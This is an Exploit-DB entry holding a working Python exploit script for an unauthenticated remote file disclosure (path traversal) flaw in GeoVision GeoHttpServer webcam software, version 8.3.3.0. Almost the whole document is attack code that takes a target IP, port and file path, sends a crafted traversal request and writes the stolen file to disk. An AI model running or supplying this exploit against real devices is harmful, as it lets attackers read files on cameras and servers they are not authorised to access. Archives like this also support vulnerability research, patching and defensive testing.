GeoVision (GeoHttpServer) Webcams - Remote File Disclosure

EDB-ID:

37258


Platform:

Hardware

Published:

2015-06-10

#!/usr/bin/python
import os
import sys
import socket
import binascii

'''
Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID      : none
Product     : GeoVision
System		: GeoHttpServer
Affected    : 8.3.3.0 (may be more)
Impact      : Critical
Remote      : Yes
Website link: http://www.geovision.com.tw/
Reported    : 10/06/2015
Author      : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability. 
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''

#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');

socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"


def main(): 
	print "#######################################################################"
	print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
	print "# Usage: <ip> <port> <file>" 
	print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini" 
	print "#######################################################################"
	exit()

try:
	url 	= sys.argv[1]
	port 	= int(sys.argv[2])
	#files 	= open(sys.argv[3],'r').read().split() 
	file 	= sys.argv[3]
except:
	main()
	
def recvall(sock):
	data = ""
	part = None
	while part != "":
		part = sock.recv(4096)
		data += part
	return data

def request(url, port, pfile):
	PATH = str(pfile)	
	HOST = url
	PORT = port
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	sock.connect((HOST, PORT))
	sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
	data = recvall(sock)
	temp = data.split("\r\n\r\n")
	sock.shutdown(1)	
	sock.close()
	return temp[1]

ret = request(url, port, file)
hex	= "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()

#~EOF